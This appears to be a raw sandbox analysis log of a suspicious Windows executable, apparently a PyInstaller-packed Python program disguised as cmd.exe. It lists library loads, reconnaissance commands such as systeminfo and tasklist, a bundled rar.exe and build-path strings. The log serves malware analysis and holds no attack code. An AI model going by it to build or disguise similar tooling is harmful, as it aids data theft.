Source: C:\Windows\System32\svchost.exe  Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe  Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sxs.dll
Source: C:\Windows\System32\tree.com  Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com  Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edputil.dll
Source: C:\Windows\System32\tree.com  Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com  Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntmarta.dll
Source: C:\Windows\System32\tree.com  Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com  Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  Section loaded: cryptbase.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: wkscli.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: mpr.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\getmac.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\tree.com  Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com  Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tree.com  Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com  Section loaded: fsutilext.dll
Source: C:\Windows\System32\tree.com  Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com  Section loaded: fsutilext.dll
Source: C:\Windows\System32\cmd.exe  Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\_MEI72642\rar.exe  Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sxs.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: mpclient.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: secur32.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: sspicli.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: version.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: msasn1.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: userenv.dll
Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: gpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\cmd.exe | File opened: C:\Users\user\Desktop\pyvenv.cfg
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: cmd.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: cmd.exe | Static file information: File size 6263156 > 1048576
Source: cmd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: cmd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: cmd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: cmd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: cmd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: cmd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: cmd.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: cmd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: cmd.exe, 00000001.00000002.2104624049.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: cmd.exe, 00000001.00000002.2102140495.00007FFDFB076000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: cmd.exe, 00000001.00000002.2102679119.00007FFDFB30E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2108397549.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: cmd.exe, 00000001.00000002.2106778885.00007FFE126D1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: cmd.exe, 00000000.00000003.1697672664.00000162C434F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.2108397549.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: cmd.exe, 00000001.00000002.2107248205.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: cmd.exe, 00000001.00000002.2105906140.00007FFE11EA1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: cmd.exe, 00000001.00000002.2103718969.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000041.00000002.1951008046.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp, rar.exe, 00000041.00000000.1938364077.00007FF69A450000.00000002.00000001.01000000.00000021.sdmp, rar.exe.0.dr
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.pdb source: powershell.exe, 0000002A.00000002.1859004442.000002168CE46000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: cmd.exe, 00000001.00000002.2106340866.00007FFE11EDC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: cmd.exe, 00000001.00000002.2106340866.00007FFE11EDC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.pdbhP source: powershell.exe, 0000002A.00000002.1859004442.000002168CE46000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: cmd.exe, 00000001.00000002.2107479396.00007FFE13301000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: cmd.exe, 00000001.00000002.2101639758.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: cmd.exe, 00000001.00000002.2102140495.00007FFDFB076000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: cmd.exe, 00000001.00000002.2105061798.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: cmd.exe, 00000001.00000002.2105587009.00007FFE11511000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: )i.pdb source: powershell.exe, 0000002A.00000002.1915922706.00000216A4BB6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: cmd.exe, 00000001.00000002.2107751391.00007FFE13331000.00000040.00000001.01000000.00000009.sdmp
